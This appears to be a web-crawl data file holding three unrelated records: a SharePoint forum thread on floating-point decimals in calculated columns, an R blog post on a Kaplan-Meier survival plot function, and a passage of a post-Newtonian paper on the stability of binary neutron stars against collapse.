Now as shown in the above picture, I am getting a value of `-6,999.95999999`, which is a result of the following calculation:-

``````(5250 * 12 * 1) - (5833.33 * 12 * 1 )
``````

Now using the calculator on my Windows machine, the result will be `-6999.96`.. so why inside my SharePoint calculated column am I getting `-6,999.95999999` instead?? Also if I change the number `5833.33` to `4833.33` I will get a correct result without extra decimals, as follows:-", null, "which is the result of the following equation:-

``````(5250 * 12 * 1) - (4833.33 * 12 * 1 )
``````

So is there a way to avoid unwanted decimals, and why are they showing in certain scenarios only? Keeping in mind that all the numeric fields I am using and all the calculated columns are of type numeric and have an automatic number of decimals..

• Did you select number field type for your calculated column? This is where you can control the decimal. – SharePointer May 17 '17 at 7:19
• @SMerchant as I mentioned before, all the calculated columns I am using are of type numeric with automatic decimal points... now I do not want to control the decimals, as users can enter the number of decimals they like (this is the business requirement).. but I want the result of my equation to be equal to the number I am getting from my Windows machine calculator.. or the calculator I used when I was in high school, or the result I get from Excel!!! Is this something SP cannot deliver out of the box!!! and it should show extra 9999 decimals? – john Gu May 17 '17 at 9:29
• Yes, users can enter the decimal in the fields, but calculated fields are auto calculating based on the input, so you can control the decimal points. I tested your numbers and I get the desired results. – SharePointer May 17 '17 at 9:55
• It is not SP failing.. it's the CPU.. type `0.1+0.2` in the F12 Console. If the CPU can't calculate it, then how on earth can an application like SharePoint running on that CPU? Excel IS a calculator programmed to deal with all CPU flaws; SP is not a calculator, not a database, it is a CMS, so you have to do more correction work yourself... with the TEXT function – Danny '365CSI' Engelman May 17 '17 at 10:01
• @SMerchant and what is the desired result which you get?? You did not get 99999 decimals? – john Gu May 17 '17 at 11:20

• I don't know your wife, so I can't tell what your problem is (but by your responses I acknowledge your problems in this area). For SharePoint: What you get is what you get. And it is not SharePoint... it is computers in general... just type `0.1 + 0.2` in a JavaScript console. Your 20 year old calculator doesn't have a 64 Bit Processor optimized to do important calculations fast and thus gets sloppy on edge-cases – Danny '365CSI' Engelman May 17 '17 at 9:55" ]
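The behavior described in the answers is easy to reproduce outside SharePoint; a small Python sketch (ours) of the same IEEE-754 double arithmetic, plus a decimal computation that matches the hand calculator:

```python
from decimal import Decimal

# The same expressions evaluated in binary floating point (doubles):
print((5250 * 12 * 1) - (5833.33 * 12 * 1))  # typically -6999.959999999999
print((5250 * 12 * 1) - (4833.33 * 12 * 1))  # also carries tiny round-off,
                                             # which display rounding may hide

# Exact decimal arithmetic gives the calculator-style answer:
print((Decimal("5250") - Decimal("5833.33")) * 12)  # -6999.96
```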
[ null, "https://i.stack.imgur.com/M5HCl.png", null, "https://i.stack.imgur.com/Gx0zd.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8712031,"math_prob":0.93342555,"size":1327,"snap":"2020-10-2020-16","text_gpt3_token_len":350,"char_repetition_ratio":0.106575966,"word_repetition_ratio":0.024291499,"special_character_ratio":0.31198192,"punctuation_ratio":0.13286713,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96693915,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-27T07:41:40Z\",\"WARC-Record-ID\":\"<urn:uuid:7e9dc9a9-a6fc-4b95-8916-9e2fbe413e8b>\",\"Content-Length\":\"152748\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:86bec427-c360-4cab-950e-6212fdc3859c>\",\"WARC-Concurrent-To\":\"<urn:uuid:0ceb5110-d6da-4a76-857c-8ed4a7b4b222>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://sharepoint.stackexchange.com/questions/215642/numeric-field-of-type-calculated-column-will-show-extra-decimal-places-with-valu\",\"WARC-Payload-Digest\":\"sha1:Q7X25RSSVQWPCXVG24MVZTGTFEOG3J3I\",\"WARC-Block-Digest\":\"sha1:P444SYEPWSN52OUIPFZKJVG3UH4EPPEJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875146665.7_warc_CC-MAIN-20200227063824-20200227093824-00529.warc.gz\"}"}
https://www.r-bloggers.com/kaplan-meier-survival-plot-with-at-risk-table/
[This article was first published on Matt's Stats n stuff » R, and kindly contributed to R-bloggers].

Credit for the bulk of this code is to Abhijit Dasgupta and the commenters on the original post here from earlier this year. I have made a few changes to the functionality which I think warrant sharing.

A brief intro: this function will use the output from a survival analysis fitted in R with 'survfit' from the 'survival' library to plot a survival curve, with the option to include a table with the numbers of those 'at risk' below the plot.

Changes to Abhijit's version included in here:

• Ability to plot subgroups in multivariate analysis
• Ability to set x and y limits (as an argument in the function)
• Strata are now ordered (so strata order in legend will match that in 'at risk' table)
• Minor changes to code layout/structure

The major change here, and the motive for toying with the code, was to be able to plot for subgroups. I don't know how common it is to only have one variable in your survival analysis, but the way the code was set up was to plot one line for each unique level grouping in the analysis. So if you have gender, a two level treatment (A and B) and three age groups (1, 2, 3), you would get a line for males on treatment A aged 1, a line for males on treatment A aged 2, a line for males on treatment A aged 3, a line for males on treatment B aged 1, etc.

This is executed, as you can see, with a regular expression (assistance from bioinformatician Richard Francis appreciated). So a basic plot, using Abhijit's example, would now look like this.

```library(survival)
data(colon)
fit <- survfit(Surv(time,status)~rx, data=colon)
ggkm(fit, timeby=500, ystratalabs=c("Obs","Lev","Lev+5FU"))```

Note: the strata names are now in (the same) order in legend and the table below.

Now say you had another variable you were adjusting for. I've assumed that the 'adhere' variable in the data is full adherence to the treatment regime, and that 0 is Yes and 1 is No (logic to me had 0 as No and 1 as Yes but the 1's seem to have a worse plot... will research the dataset and update when I get a chance).

```colon$adhere <- factor(colon$adhere, labels=c("Yes","No"))
fit <- survfit(Surv(time,status)~rx + adhere, data=colon)```

Here we can plot just those that didn't adhere to the treatment:

`ggkm(fit, timeby=500, ystratalabs=c("Obs","Lev","Lev+5FU"), subs="No", main="Survival curve for those that don't adhere")`

`ggkm(fit, timeby=500, ystratalabs=c("Obs","Lev","Lev+5FU"), subs="Yes", main="Survival curve for those that do adhere")`

With this you can now easily see the difference in survival for those that did not and those that did adhere to treatment.

This also works for multiple variables. Like if you had sex in the model too, you could use:

`ggkm(fit, timeby=500, ystratalabs=c("Obs","Lev","Lev+5FU"), subs=c("Yes","Male"), main="Survival curve for those Males that do adhere")`

And, here's the code. Comments welcomed.

CODE WAS BROKEN by an update in versions (either R or ggplot). Working code available here.
[ null, "https://mcfromnz.files.wordpress.com/2011/11/surv_1.png", null, "http://mcfromnz.files.wordpress.com/2011/11/surv_1.png", null, "https://feeds.wordpress.com/1.0/comments/mcfromnz.wordpress.com/271/", null, "https://i0.wp.com/stats.wordpress.com/b.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9264365,"math_prob":0.7636536,"size":3720,"snap":"2020-34-2020-40","text_gpt3_token_len":964,"char_repetition_ratio":0.114639394,"word_repetition_ratio":0.10015898,"special_character_ratio":0.24596775,"punctuation_ratio":0.11011524,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9607686,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,1,null,1,null,5,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-14T14:54:38Z\",\"WARC-Record-ID\":\"<urn:uuid:9b423558-462a-4835-b057-82cdef84ce39>\",\"Content-Length\":\"72493\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f98f4891-28a3-4f3b-9ce1-9d66a6b8595c>\",\"WARC-Concurrent-To\":\"<urn:uuid:7eec82e6-93a0-47b6-b68f-96fbe394a721>\",\"WARC-IP-Address\":\"172.67.170.238\",\"WARC-Target-URI\":\"https://www.r-bloggers.com/kaplan-meier-survival-plot-with-at-risk-table/\",\"WARC-Payload-Digest\":\"sha1:E5SZLE235PCBD6TSZWRRE5SBRBPQULJG\",\"WARC-Block-Digest\":\"sha1:ZJRSFMOJ4EK7I6QXKFNFGYKP6WJGZLEN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439739328.66_warc_CC-MAIN-20200814130401-20200814160401-00107.warc.gz\"}"}
https://www.arxiv-vanity.com/papers/gr-qc/9805026/
[ "# Stability of coalescing binary stars against gravitational collapse: hydrodynamical simulations

Masaru Shibata, Department of Earth and Space Science, Graduate School of Science, Osaka University, Toyonaka, Osaka 560-0043, Japan    Thomas W. Baumgarte, Department of Physics, University of Illinois at Urbana-Champaign, Urbana, Il 61801    Stuart L. Shapiro, Departments of Physics and Astronomy, and NCSA, University of Illinois at Urbana-Champaign, Urbana, Il 61801

###### Abstract

We perform simulations of relativistic binary stars in post-Newtonian gravity to investigate their dynamical stability prior to merger against gravitational collapse in a tidal field. In general, our equations are only strictly accurate to first post-Newtonian order, but they recover full general relativity for spherical, static stars. We study both corotational and irrotational binary configurations of identical stars in circular orbits. We adopt a soft, adiabatic equation of state with Γ = 1.4, for which the onset of instability occurs at a sufficiently small value of the compaction that a post-Newtonian approximation is quite accurate. For such a soft equation of state there is no innermost stable circular orbit, so that we can study arbitrarily close binaries. This choice still allows us to study all the qualitative features exhibited by any adiabatic equation of state regarding stability against gravitational collapse. We demonstrate that, independent of the internal stellar velocity profile, the tidal field from a binary companion stabilizes a star against gravitational collapse.

###### pacs:

PACS number(s): 04.30.Db, 04.25.Nx, 97.60.Jd, 97.80.Fk

## I Introduction

Binary neutron stars are known to exist, and for some of these systems in our own galaxy (including PSR B1913+16 and B1534+12), general relativistic effects in the binary orbit have been measured to high precision [1, 2]. Interest in binary neutron stars has been stimulated by the prospect of future observations of extragalactic systems by gravitational wave interferometers like LIGO, VIRGO, TAMA and GEO. Binary neutron stars are among the most promising sources of gravitational waves for these detectors, and therefore it is important to predict theoretically the gravitational waveform emitted during the inspiral and the final coalescence of the two stars. Interest in these systems also arises on a more fundamental level, since the two-body problem is one of the outstanding unsolved problems in classical general relativity.

Considerable effort has gone into understanding binary neutron stars. Most of this work has been performed within the framework of Newtonian and post-Newtonian gravity (see the published reviews for lists of references). General relativistic treatments are currently only in their infancy. Recently, Wilson, Mathews and Marronetti (hereafter WMM) reported results obtained with a relativistic hydrodynamics code. Their code assumed several simplifying physical and mathematical approximations. Their results suggest that the central densities of the stars increase as the stars approach each other and that massive neutron stars, stable in isolation, individually collapse to black holes prior to merger. WMM therefore find that in general relativity, the presence of a companion star and its tidal field tend to destabilize the stars in a binary system.
This conclusion is contrary to what is expected from Newtonian, post-Newtonian [10, 11, 12], perturbative [13] and matched asymptotic expansion [14, 15] treatments of the problem. Constructing self-consistent, fully relativistic initial data for two neutron stars in a circular, quasi-equilibrium orbit does not show any evidence of this “crushing effect” either. Moreover, applying energy turning-point methods to sequences of these initial data suggests that inspiraling neutron star binaries are secularly stable all the way down to the innermost stable circular orbit. To summarize, most researchers currently believe that the maximum allowed rest mass of neutron stars in close binaries is larger than in isolation, and that their central density is smaller than in isolation. If there exists any destabilizing, relativistic effect at high post-Newtonian order, then this effect is much smaller than the dominating stabilizing effect of the tidal field.

However, to date, the only fully dynamical treatment of the problem in general relativity – that of WMM – reports a star-crushing effect. In this paper, we perform a new, fully dynamical simulation for binary stars in post-Newtonian gravity. We use a formalism in which (1) all first post-Newtonian terms are taken into account, and (2) sufficient nonlinearity is retained, so that spherical, static stars satisfy the fully general relativistic equations exactly. As explained in section II below, this formalism is very suitable for studying binary neutron stars. We study relativistic effects in binary stars with small compactions M/R, where M and R are typical values of the stellar mass and radius, so that a post-Newtonian treatment is completely adequate.

By performing a fully dynamical calculation, we can relax various constraints assumed in previous treatments. For example, Wiseman assumed the stars to remain spherically symmetric, Baumgarte et al. assumed the binary stars to be corotating, and Thorne assumed the stars’ orbital separation to be much larger than the stars’ radius. Here, we relax all these assumptions and study tidally deformed stars, both corotational and irrotational, at arbitrarily small separations. We still find that the presence of the tidal field of a companion star tends to stabilize neutron stars against catastrophic collapse.

To establish the stability of binary stars against collapse, we construct quasi-equilibrium initial data for identical binary neutron stars in a close, circular orbit. The idea is to show whether stars in a binary formed from the inspiral of objects which are stable in isolation remain stable at close separation. Our models have rest masses near the maximum allowed rest mass for spherical stars in isolation and thus provide the best candidates for collapse if the tidal field is destabilizing (stars with rest masses well below the maximum allowed value are unambiguously stable). In order to demonstrate that these stars are dynamically stable, we need to locate the onset of instability in the binary, and compare it with the onset of instability for isolated stars. Since the shift is fairly small, a very careful treatment with high numerical accuracy is necessary. We detail our method of locating the onset of instability in section IV.

The paper is organized as follows: In section II, we present the post-Newtonian formalism adopted in this paper. We calibrate our code in section III by locating the analytically known onset of radial instability of relativistic spherical stars against gravitational collapse.
In section IV, we study the dynamical stability against gravitational collapse of close binary stars, and briefly summarize our results in section V.

## II Formulation

In the usual post-Newtonian treatment, the fluid and field equations are derived by systematically expanding the Einstein equation and the relativistic hydrodynamic equations in powers of $c^{-2}$. In this paper, we introduce a different approach. Since in a first order post-Newtonian approximation, the spatial metric may always be chosen conformally flat, we can derive post-Newtonian equations by starting with the relativistic equations written previously in the conformally flat approximation [8, 7]. We then neglect some of the second and higher order post-Newtonian terms, but retain sufficient nonlinearity so that this formalism recovers full general relativity for some limiting regimes of interest in this paper.

We write the spatial metric in the form

$\gamma_{ij} = \psi^4 \tilde\gamma_{ij} = \psi^4 \delta_{ij},$ (1)

so that the line element becomes

$ds^2 = g_{\mu\nu}\,dx^\mu dx^\nu = (-\alpha^2 + \beta_k\beta^k)\,dt^2 + 2\beta_i\,dx^i dt + \psi^4\delta_{ij}\,dx^i dx^j.$ (2)

Here, $\alpha$, $\beta^i$ and $\psi$ are the lapse function, the shift vector and the conformal factor, and we adopt geometrized units in which $G = c = 1$. We also adopt cartesian coordinates $x^i$, so that the covariant derivative associated with $\delta_{ij}$ conveniently reduces to the ordinary partial derivative $\partial_i$.

We employ a perfect fluid stress-energy tensor

$T_{\mu\nu} = \rho\Big(1 + \varepsilon + \frac{P}{\rho}\Big)u_\mu u_\nu + P g_{\mu\nu},$ (3)

where $\rho$, $\varepsilon$, $P$, and $u^\mu$ denote the rest mass density, specific internal energy, pressure, and the fluid four velocity, respectively. For initial data, we assume a constant entropy configuration with a polytropic pressure law

$P = K\rho^\Gamma,$ (4)

where $K$ and $\Gamma$ are constants ($n = 1/(\Gamma - 1)$ is the corresponding polytropic index). For the evolution of the matter we assume the adiabatic relation

$P = (\Gamma - 1)\rho\varepsilon.$ (5)

The continuity equation is

$\frac{\partial\rho_*}{\partial t} + \frac{\partial(\rho_* v^i)}{\partial x^i} = 0,$ (6)

where $\rho_* = \rho\alpha u^0\psi^6$ and $v^i = u^i/u^0$.

The relativistic Euler equation is

$\frac{\partial(\rho_*\tilde u_i)}{\partial t} + \frac{\partial(\rho_*\tilde u_i v^j)}{\partial x^j} = -\alpha\psi^6 P_{,i} - \rho_*\alpha\tilde u^0\alpha_{,i} + \rho_*\tilde u_j\beta^j{}_{,i} + \frac{2\rho_*\tilde u_k\tilde u_k}{\psi^5\tilde u^0}\,\psi_{,i},$ (7)

and the energy equation is

$\frac{\partial e_*}{\partial t} + \frac{\partial(e_* v^j)}{\partial x^j} = 0,$ (8)

where

$\tilde u_j = (1 + \Gamma\varepsilon)\,u_j,$ (9)
$\tilde u^0 = (1 + \Gamma\varepsilon)\,u^0,$ (10)
$e_* = (\rho_*\varepsilon_*)^{1/\Gamma}; \qquad \varepsilon_* = \varepsilon\,(\alpha u^0\psi^6)^{\Gamma-1},$ (11)
$v^i = -\beta^i + \frac{\delta^{ij}u_j}{\psi^4 u^0}.$ (12)

Note that $\sqrt{\gamma} = \psi^6$ in the conformally flat approximation. From the normalization condition $u^\mu u_\mu = -1$, we find

$(\alpha u^0)^2 = 1 + \frac{u_i u_i}{\psi^4} = 1 + \frac{\tilde u_i\tilde u_i}{\psi^4}\Big[1 + \frac{\Gamma\varepsilon_*}{(\alpha u^0\psi^6)^{\Gamma-1}}\Big]^{-2}.$ (13)

In our numerical simulation, we use $\rho_*$, $\tilde u_i$, and $e_*$ as the independent variables that are determined by the hydrodynamical equations.

Equations for $\psi$, $\beta^i$ and $\alpha$ can be found from the Hamiltonian constraint, the momentum constraint, and the maximal slicing condition tr$K = 0$, where tr$K$ is the trace of the extrinsic curvature $K_{ij}$ (details can be found, for example, in [7, 8]).

Assuming maximal slicing for all times, we have $\partial_t\,\mathrm{tr}K = 0$, and can use the trace of the evolution equation for $K_{ij}$ to find

$\Delta(\alpha\psi) = 2\pi\alpha\psi^5\big(E + 2S_{ij}\delta^{ij}\psi^{-4}\big) + \frac{7}{8}\alpha\psi^5 K_{ij}K^{ij}.$ (14)

Here $E$ and $S_{ij}$ denote the projections of the stress-energy tensor with respect to normal observers, and $\Delta$ is the flat space Laplacian.

Since we assume the spatial metric to remain conformally flat for all times, the trace free part of the time evolution equation for $\gamma_{ij}$ has to vanish, which yields

$2\alpha\psi^{-4}K_{ij} = \delta_{il}\beta^l{}_{,j} + \delta_{jl}\beta^l{}_{,i} - \frac{2}{3}\delta_{ij}\beta^l{}_{,l}.$ (15)

This equation shows that the extrinsic curvature no longer represents independent dynamical degrees of freedom (i.e., it may no longer exactly satisfy its fully relativistic evolution equation). Inserting this into the momentum constraint, $D_j K^j{}_i = 8\pi J_i$, where $J_i$ is the matter momentum density, we find

$\Delta\beta_i + \frac{1}{3}\beta_{j,ji} = \big[\ln(\alpha\psi^{-6})\big]_{,j}\Big(\beta_{i,j} + \beta_{j,i} - \frac{2}{3}\delta_{ij}\beta_{l,l}\Big) + 16\pi\alpha J_i.$ (16)

Finally, the Hamiltonian constraint yields

$\Delta\psi = -2\pi\psi^5 E - \frac{1}{8}K_{ij}K^{ij}\psi^5.$ (17)
From the post-Newtonian point of view assumed here, a conformally flat spatial metric takes into account all Newtonian and first post-Newtonian terms, and differences from a general, fully nonlinear metric appear at second post-Newtonian order [20, 21]. We can therefore use the above equations, which assume a conformally flat metric, as a starting point for a post-Newtonian approximation. We simplify the problem by neglecting some terms of second or higher post-Newtonian order. In particular, we will neglect the nonlinear terms $K_{ij}K^{ij}$ in (14) and (17), and the $[\ln(\alpha\psi^{-6})]_{,j}(\cdots)$ term in (16). Note that for static, spherically symmetric spacetimes, these terms vanish identically, so that we still recover full general relativity for these spacetimes.

Adopting this approximation, the field equations reduce to

$\Delta(\alpha\psi) = 2\pi\alpha\psi^5\big(E + 2S_{ij}\delta^{ij}\psi^{-4}\big) \equiv 4\pi S_{\alpha\psi},$ (18)
$\Delta\beta_i + \frac{1}{3}\beta_{j,ji} = 16\pi\alpha J_i,$ (19)
$\Delta\psi = -2\pi\psi^5 E \equiv 4\pi S_\psi.$ (20)

We decompose the equation for $\beta_i$ using

$\beta_i = 4B_i - \frac{1}{2}\big[\chi_{,i} + (B_k x^k)_{,i}\big]$ (21)

so that $B_i$ and $\chi$ satisfy

$\Delta B_i = 4\pi\alpha J_i,$ (22)
$\Delta\chi = -4\pi\alpha J_i x^i.$ (23)

To summarize, we have reduced Einstein’s equations to six elliptic equations for the six functions $\alpha\psi$, $\psi$, $B_i$, and $\chi$. We solve these equations together with the boundary conditions

$\alpha\psi = 1 - \frac{1}{r}\int S_{\alpha\psi}\,dV + O(r^{-3}),$ (24)
$\psi = 1 - \frac{1}{r}\int S_\psi\,dV + O(r^{-3}),$ (25)
$B_x = -\frac{x}{r^3}\int\alpha J_x x\,dV - \frac{y}{r^3}\int\alpha J_x y\,dV + O(r^{-4}),$ (26)
$B_y = -\frac{x}{r^3}\int\alpha J_y x\,dV - \frac{y}{r^3}\int\alpha J_y y\,dV + O(r^{-4}),$ (27)
$B_z = -\frac{z}{r^3}\int\alpha J_z z\,dV + O(r^{-4}),$ (28)
$\chi = \frac{1}{r}\int\alpha J_i x^i\,dV + O(r^{-3}),$ (29)

where $dV$ is the coordinate volume element. Note that having removed some of the nonlinear terms from the elliptic equations (18) to (23), their right hand sides now have compact support. This further simplifies the computations, since in imposing the boundary conditions at a finite separation, we do not truncate any source terms in (18) to (23) that extend to infinity.

Having neglected some second post-Newtonian terms, our formalism is strictly only first-order post-Newtonian. Note, however, that we have only truncated some of the non-linear terms in the field equations, pieces of which, loosely speaking, can be associated with dynamical features of the gravitational fields. In particular, we still solve the fully relativistic hydrodynamic equations. We therefore retain many of the nonlinear features of full general relativity, and expect that this formalism provides an excellent approximation in several limiting regimes of interest here.

For example, for static, spherically symmetric stars, we recover the fully relativistic, Oppenheimer-Volkov solution. This is because we can choose coordinates such that all the terms neglected in the field equations vanish identically, and the equations of hydrodynamics (or, in this case, hydrostatics) are fully relativistic. Constructing sequences of equilibrium solutions, we can apply the energy turning-point method and find the onset of radial instability – again without approximation.

Corotational or irrotational binary stars at large separations are very close to being spherically symmetric because the two stars interact only through weak tidal fields (for example, in the Newtonian case, see refs. [9, 22]). Hence, our formalism can describe the individual stars to high accuracy, whether or not the stars are very compact and have strong gravitational fields. We therefore expect that our approximations are quite adequate.
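To make the structure of these elliptic solves concrete, here is a minimal sketch (our own construction, not the authors' code) of Eq. (20) in spherical symmetry: a fixed-point iteration on the radial Green's-function integral, which automatically satisfies the $1/r$ falloff of Eq. (25). The toy source profile, grid parameters, and helper names are all assumptions for illustration; the actual 3D code solves the same equations as Poisson problems on a Cartesian grid with the multipole boundary conditions (24)-(29).

```python
import numpy as np

N, R = 400, 1.0
r = np.linspace(1e-4, 4.0 * R, N)
E = np.where(r < R, 1e-3 * (1.0 - (r / R) ** 2), 0.0)  # toy energy density
dr = r[1] - r[0]

def cumtrapz(f):
    # Cumulative trapezoid integral from r[0] out to r[i].
    c = np.zeros_like(f)
    c[1:] = np.cumsum(0.5 * (f[1:] + f[:-1]) * dr)
    return c

psi = np.ones_like(r)
for _ in range(50):
    q = -2.0 * np.pi * psi ** 5 * E       # right-hand side of Eq. (20)
    inner = cumtrapz(q * r ** 2)          # integral_0^r  q r'^2 dr'
    total = cumtrapz(q * r)
    outer = total[-1] - total             # integral_r^inf q r'  dr'
    psi_new = 1.0 - inner / r - outer     # tends to 1 + M/(2r), cf. Eq. (25)
    if np.max(np.abs(psi_new - psi)) < 1e-12:
        break
    psi = psi_new

print(psi[0], psi[-1])  # central psi slightly above 1; psi -> 1 far out
```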
In a binary in which the orbital separation $a$ is large compared to the stellar radius $R$, we can treat the gravitational effects and tidal deformation due to the companion star as a small perturbation. We can then expand the gravitational field around the unperturbed, spherical solution [14, 15]

$$\alpha = {}^{(0)}\alpha + {}^{(2)}\alpha\,\epsilon^2 + {}^{(4)}\alpha\,\epsilon^4 + {}^{(5)}\alpha\,\epsilon^5 + {}^{(6)}\alpha\,\epsilon^6 + {}^{(7)}\alpha\,\epsilon^7 + \cdots, \qquad (30)$$
$$\psi = {}^{(0)}\psi + {}^{(2)}\psi\,\epsilon^2 + {}^{(4)}\psi\,\epsilon^4 + {}^{(5)}\psi\,\epsilon^5 + {}^{(6)}\psi\,\epsilon^6 + {}^{(7)}\psi\,\epsilon^7 + \cdots, \qquad (31)$$
$$\beta^i = {}^{(1)}\beta^i\,\epsilon + {}^{(3)}\beta^i\,\epsilon^3 + {}^{(5)}\beta^i\,\epsilon^5 + {}^{(6)}\beta^i\,\epsilon^6 + {}^{(7)}\beta^i\,\epsilon^7 + {}^{(8)}\beta^i\,\epsilon^8 + \cdots, \qquad (32)$$
$$\tilde\gamma_{ij} = \delta_{ij} + {}^{(2)}h_{ij}\,\epsilon^2 + {}^{(4)}h_{ij}\,\epsilon^4 + {}^{(5)}h_{ij}\,\epsilon^5 + \cdots, \qquad (33)$$

where we assume

$$v^i \sim u^i \sim (M/a)^{1/2} \lesssim (R/a)^{1/2} \sim \epsilon, \qquad (34)$$

and where $M$ is the gravitational mass, and ${}^{(0)}\alpha$ and ${}^{(0)}\psi$ denote the spherically symmetric solutions. Note that $\epsilon$ denotes the magnitude of gravitational effects from the companion star, and hence the expansion in terms of $\epsilon$ is different from a post-Newtonian expansion.

In our formalism, we can calculate ${}^{(0)}\alpha$ and ${}^{(0)}\psi$ exactly. Newtonian and first post-Newtonian terms appearing in the higher-order corrections to $\alpha$, $\psi$, and $\beta^i$ are also taken into account consistently to all orders in $\epsilon$, although second post-Newtonian terms in these quantities and in the corrections ${}^{(n)}h_{ij}$ are not included. Our approximation is therefore appropriate for investigating the stability of fully general relativistic spherical stars due to Newtonian and first post-Newtonian tidal effects, which is our goal in this paper.

Details of our numerical methods, for solving both the hydrodynamical equations and the Poisson equations, can be found in the references. We assume symmetry with respect to the equatorial plane, and solve the equations on a uniform grid covering the physical space $-L \le x \le L$, $-L \le y \le L$, and $0 \le z \le L$, where $L$ is the location of the outer boundaries. We use a single resolution for the spherically symmetric stars, and $N = 50$, 60, and 75 grid points per dimension for the binary configurations.

As a numerical check, we monitor the conservation of proper mass

$$M_p = \int\rho_*\,dV, \qquad (35)$$

total gravitational mass

$$M \equiv -2\int S_\psi\,dV, \qquad (36)$$

and total angular momentum

$$J \equiv \int(-yJ^x + xJ^y)\,\psi^6\,dV. \qquad (37)$$

Our difference scheme guarantees conservation of $M_p$ exactly. Accurate conservation of $M$ and $J$ depends on the grid resolution $N$, and the errors accumulated over one orbital period decrease with increasing $N$.

## III Dynamical stability of spherical static stars

In this section we calibrate our code by locating the analytically known onset of instability of spherical equilibrium stars.

For initial conditions, we construct sequences of equilibria satisfying the Oppenheimer-Volkoff equations. Note that for these configurations our formalism is exact and recovers the fully relativistic solutions. In Fig. 1 we show the proper mass $M_p$ and the (isotropic) coordinate radius $R$ as a function of the central density $\rho_c$ for a polytrope with $\Gamma = 1.4$. We have taken advantage of the scale freedom in the problem and chosen $K = 1$. Together with $G = c = 1$, this assignment uniquely determines our non-dimensional units for length, mass, etc. For any other value of $K$, all the results can be rescaled trivially. Note that for a critical central density $\rho_{\rm crit}$, the mass goes through a maximum $M_{p,\rm max}$. This maximum marks the onset of radial instability, and separates the stable branch ($\rho_c < \rho_{\rm crit}$) from the unstable branch ($\rho_c > \rho_{\rm crit}$) of the sequence.

For $\Gamma = 1.4$, the compaction $M/R$ of the maximum mass configuration is much less than unity (recall that this compaction approaches zero as $\Gamma \to 4/3$). Nevertheless, the mass versus central density equilibrium curve still exhibits an extremum, and therefore has all the qualitative features of any value of $\Gamma$ regarding the issue of radial stability. Choosing $\Gamma = 1.4$ therefore allows us to study these qualitative features in a regime in which the post-Newtonian approximation is very reliable.
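For concreteness, the following sketch integrates the Oppenheimer-Volkoff equations outward for the $\Gamma = 1.4$, $K = 1$ polytrope and scans central densities, tracing the $M(\rho_c)$ curve of Fig. 1. The forward-Euler integrator, step size, and stopping criterion are illustrative choices of ours, not the paper's one-dimensional scheme.

```python
import numpy as np

# Illustrative Oppenheimer-Volkoff integration for a Gamma = 1.4, K = 1
# polytrope in geometrized units. Integrator and tolerances are assumed.

K, GAM = 1.0, 1.4

def ov_star(rho_c, dr=2e-3):
    P_c = K * rho_c**GAM
    r, m, P = dr, 0.0, P_c
    while P > 1e-12 * P_c:                      # stop near the surface
        rho = (P / K)**(1.0 / GAM)              # rest-mass density
        e = rho + P / (GAM - 1.0)               # total energy density
        dm = 4.0 * np.pi * r**2 * e
        dP = -(e + P) * (m + 4.0 * np.pi * r**3 * P) / (r * (r - 2.0 * m))
        m, P, r = m + dm * dr, P + dP * dr, r + dr
    return m, r                                 # gravitational mass, radius

for rho_c in (3e-5, 6e-5, 1.2e-4, 2.4e-4):
    M, R = ov_star(rho_c)
    print(f"rho_c = {rho_c:.1e}:  M = {M:.3f},  R = {R:.1f}")
# Scanning rho_c traces out the equilibrium sequence; the maximum of
# M(rho_c) marks the onset of radial instability.
```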
Figure 1: Proper mass $M_p$ (top panel) and isotropic radius $R$ (bottom panel) as a function of central density $\rho_c$ for relativistic, spherical polytropes with $\Gamma = 1.4$.

Figure 2: Time evolution of $\rho_*$ at the center of the stars for models A - E.

Consider results for five different initial configurations, which we denote by A, B, C, D and E (see Fig. 1). We construct these initial data with a one-dimensional integration of the Oppenheimer-Volkoff equations. These data are in equilibrium according to the one-dimensional finite difference equations. Interpolating these data onto the three-dimensional grid of our evolution scheme introduces a slight perturbation of the equilibrium solution, since the truncation error of the three-dimensional finite difference equations is different from the one-dimensional one. Typically, we find that the pressure of the interpolated models is slightly larger than the required equilibrium value on the three-dimensional grid. We compensate for that by artificially decreasing the polytropic constant $K$ by a small amount. Note that our finite differencing is convergent, so that for finer grids we need to change $K$ by smaller amounts. For the results presented here, the initial radius of the star is covered by 30 grid points.

Note that because of the scale freedom in the problem, reducing $K$ is equivalent to increasing the mass. This is because $K^{n/2}$, where $n = 1/(\Gamma - 1)$ is the polytropic index, has units of mass (or length) in geometrized units. Consider now a model in which we have reduced $K$ by, say, a small fraction $\delta K/K$. We can then rescale this model in order to investigate a different $K$, for example, the original value $K = 1$. Then, the mass of the re-scaled model has to increase by a fraction $(n/2)\,\delta K/K$ to remain in equilibrium. For example, reducing $K$ by 0.5% is, for $\Gamma = 1.4$, equivalent to increasing the model's mass by 0.625%.

We can now test the stability of our models by varying $K$ by small amounts. Small variations in $K$ serve to trigger small initial perturbations away from equilibrium (e.g. "pressure depletion"). Stable models will not change their qualitative behavior, whereas unstable models will. In Fig. 2 we show the time evolution of the central density for the five models. Solid curves are the results for $K = 1$, and dotted curves are for $K = 0.995$. In this section, we plot time in units of $\rho_c^{-1/2}$, where $\rho_c$ is the central value of $\rho_*$ of the corresponding spherical equilibrium star.

Obviously, models A and B oscillate stably, for both values of $K$. The period of these oscillations can be compared with the approximate analytic value

